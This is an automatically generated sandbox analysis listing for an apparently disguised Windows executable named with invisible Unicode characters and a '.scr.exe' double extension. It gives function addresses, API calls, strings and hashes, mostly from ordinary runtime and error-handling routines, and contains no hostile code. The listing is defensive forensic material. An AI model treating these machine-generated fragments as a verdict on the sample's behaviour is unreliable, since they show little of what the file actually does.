Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction ID: cf2cd0de91436b60c3f26db50e8dd007032d8561ee2a40b93c91f429681277f9
Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction Fuzzy Hash: 6F91D02AA8864AA1F721BF24D45337DB3A1EB40B54FC4427ADA5E473D5DE3CE841A320

Function 00007FF73AE305A8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE30887

Part of subcall function 00007FF73AE369C4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE369E1

Strings

ccs, xrefs: 00007FF73AE307C2
UTF-16LEUNICODE, xrefs: 00007FF73AE30825
UTF-8, xrefs: 00007FF73AE30806

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
Instruction ID: 0a88048bb19200a8d745372648249c36119d0adb88c6ad217983deedac9500d8
Opcode Fuzzy Hash: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
Instruction Fuzzy Hash: 7481E97EE8C202A5F7657F258113278B690AF10F86FD540B4CA8E576D5CB2FE801BB61

Function 00007FF73AE1EFD8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF73AE1F024
_CallSETranslator.LIBVCRUNTIME ref: 00007FF73AE1F073

Strings

MOC, xrefs: 00007FF73AE1F038
RCC, xrefs: 00007FF73AE1F041

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
Instruction ID: d39db971013af081422537f7f258d923801b88a5601c65e4729689c3866e232c
Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
Instruction Fuzzy Hash: 23619C37A08B559AF710AF65D4823ADB7A0FB48B88F4442A6EF4D13B96DF38E444C750

Function 00007FF73AE1F334 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF73AE1F35C
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF73AE1F444

Strings

csm, xrefs: 00007FF73AE1F496
csm, xrefs: 00007FF73AE1F37E

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
Instruction ID: e8d9fad9bcc1945ac75d32b9f96e1130ab4bd79b7a950e59f1c499bf46d1f982
Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
Instruction Fuzzy Hash: 0451D17A94825296FA64BF11D147368B7A0FB44B88F8481F2DA9D43B86CF3CE850E750

Function 00007FF73AE12890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A

MessageBoxW.USER32 ref: 00007FF73AE1299B
MessageBoxA.USER32 ref: 00007FF73AE129B7

Strings

Fatal error detected, xrefs: 00007FF73AE12971, 00007FF73AE129A9
%s%s: %s, xrefs: 00007FF73AE12916

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
Instruction ID: 40ab15a3d79da1ac363ef2259f92d73906dc5c56ce12deb60caa69a578458ee2
Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
Instruction Fuzzy Hash: 69317076A68692A1F630FB10E4536EAA364FF84B84FC04176E68D07A99DF3CD205DB50

Function 00007FF73AE13EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00007FF73AE139EA), ref: 00007FF73AE13EF1

Part of subcall function 00007FF73AE129E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14
Part of subcall function 00007FF73AE129E0: MessageBoxW.USER32 ref: 00007FF73AE12AF0

Strings

Failed to get executable path., xrefs: 00007FF73AE13EFB
GetModuleFileNameW, xrefs: 00007FF73AE13F02
Failed to convert executable path to UTF-8., xrefs: 00007FF73AE13F2A

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
Instruction ID: 5dde69427160d7f1a42af665cbcfb0202e7b5e9a4ffce6230930577abd2d413f
Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
Instruction Fuzzy Hash: DC018859F6D69360FA60B720D8573F5D2516F4C7C4FC004F1D84D86292EE1CE109E720

Function 00007FF73AE2CB60 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF73AE2CBDF
WriteFile.KERNEL32 ref: 00007FF73AE2CEA7
WriteFile.KERNEL32 ref: 00007FF73AE2CEED
GetLastError.KERNEL32 ref: 00007FF73AE2CFA3

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
Instruction ID: da5449148a9f34ed4caf9898ccfdbfd6b6f0e392e726e18d300cae25eb50584d
Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
Instruction Fuzzy Hash: 3AD16676B18A94A9F710FF74C0462ACB7B1FB84B98B844279CE5E57B89CE39D406D310

Function 00007FF73AE25854 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF73AE25887
GetFileInformationByHandle.KERNEL32 ref: 00007FF73AE258E9
GetLastError.KERNEL32 ref: 00007FF73AE2597A
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,00007FF73AE2578C), ref: 00007FF73AE259C6

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
Instruction ID: 9046046e45b9f10776cd44e3a08e95b67232eb7ca0848f7eb309044bd64e156c
Opcode Fuzzy Hash: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
Instruction Fuzzy Hash: 5151CE26E882459AFB10FF70C5533BCA3A1AB48B68F908579DE6D47688DF3CD4809730

Function 00007FF73AE12330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF73AE12364
SetWindowLongPtrW.USER32 ref: 00007FF73AE12386
GetWindowLongPtrW.USER32 ref: 00007FF73AE123B0
InvalidateRect.USER32 ref: 00007FF73AE123D0

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction ID: f07997df4ca2418650652616aef91567794fd44e60b77eb4520e8c267f8a8969
Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction Fuzzy Hash: F311E925E4816352FB58B76AF9472B99291EF88B80FC480F0DA5906BCDCD7DD4C16610

Function 00007FF73AE3628C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AE31DD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE31E03

_get_daylight.LIBCMT ref: 00007FF73AE363A4
_get_daylight.LIBCMT ref: 00007FF73AE363B5

Strings

?, xrefs: 00007FF73AE36335

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
Instruction ID: 9b925a85e679b8c25b2d0d0712b4e84535a284960ebe3bf9634f34c4439a52fb
Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
Instruction Fuzzy Hash: 2E41172AE0828266FB60BB25E44337AD7A0EF90FA4F9442B5EE5C07AD5DF3DD4419710

Function 00007FF73AE295A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE295D6

Part of subcall function 00007FF73AE2AF0C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF22
Part of subcall function 00007FF73AE2AF0C: GetLastError.KERNEL32(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF2C

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF73AE1BFE5), ref: 00007FF73AE295F4

Strings

C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, xrefs: 00007FF73AE295E2

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
API String ID: 3976345311-3642722051
Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
Instruction ID: 3661a09d2740299081e4e64c6a38f0c9d8a255bd913fb9a633ce6f6ab6e65a11
Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
Instruction Fuzzy Hash: 9B41A47AA88706AAFB54FF21A4430BCA794EF847C0F945079E94E47B85DF3DD4819320

Function 00007FF73AE2D1F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF73AE2D30F
GetLastError.KERNEL32 ref: 00007FF73AE2D331

Strings

U, xrefs: 00007FF73AE2D2BB

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
Instruction ID: 8ca1a6bf5ca121d6e52d1427d955a35fdfdecec9968a3ab89353e848f5cee30d
Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
Instruction Fuzzy Hash: 3341E326B18A45A2EB60FF65E4863A9A760FB88B90F804135EF4D87788DF3CD441D760

Function 00007FF73AE2F918 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF73AE2F958
GetCurrentDirectoryW.KERNEL32 ref: 00007FF73AE2F9AA

Strings

:, xrefs: 00007FF73AE2F96E

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 4482f0b2aa88d097fa4b172b4d0b9d8fa621ceaf6a6e580bcf5a02da10cef38f
Instruction ID: 4c7d896f09186eba7079ffa3ff2a339455ec342e2ea855a97ea0502a10af82a7
Opcode Fuzzy Hash: 4482f0b2aa88d097fa4b172b4d0b9d8fa621ceaf6a6e580bcf5a02da10cef38f
Instruction Fuzzy Hash: 87210626A88289A1FB20BB15D45727DB3B1FB84B44FC1807AD68E43284DF7CE945D761

Function 00007FF73AE12B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A

MessageBoxW.USER32 ref: 00007FF73AE12C05
MessageBoxA.USER32 ref: 00007FF73AE12C21

Strings

Fatal error detected, xrefs: 00007FF73AE12BDB, 00007FF73AE12C13

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
Instruction ID: 248f33a5cbed526a178ee3b0700a491b6a0f61e02ba4fd9d8ab4c83db8dde205
Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
Instruction Fuzzy Hash: 1B219F76668A82A1F720FB10E4536EAA364FF84784FC01175E68D47AA9DF3CD205CB20

Function 00007FF73AE12C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A

MessageBoxW.USER32 ref: 00007FF73AE12D25
MessageBoxA.USER32 ref: 00007FF73AE12D41

Strings

Error detected, xrefs: 00007FF73AE12CFB, 00007FF73AE12D33

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
Instruction ID: 0a15643f65f9c930c03f7cea75ef3520c3e7b1682362109956ecd1f28d9ecf09
Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
Instruction Fuzzy Hash: 2E219176668685A1F720FB10E4936EAA364FF84784FC01175E68D47AA5DF3CD205CB10

Function 00007FF73AE1FE80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF73AE1FED0
RaiseException.KERNEL32 ref: 00007FF73AE1FF11

Strings

csm, xrefs: 00007FF73AE1FEFE

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
Instruction ID: 4d9a5b5e6d9fad8b4c0c7ffb63671e5e96015faf3c60e7d7e3ae193168fb369d
Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
Instruction Fuzzy Hash: BC119D36A08B4092EB60AF18F401269B7E0FB88B94F9842B5DE8D4775AEF3CC451CB00

Function 00007FF73AE3041C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE3044C
GetDriveTypeW.KERNEL32 ref: 00007FF73AE3048C

Strings

:, xrefs: 00007FF73AE30475

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

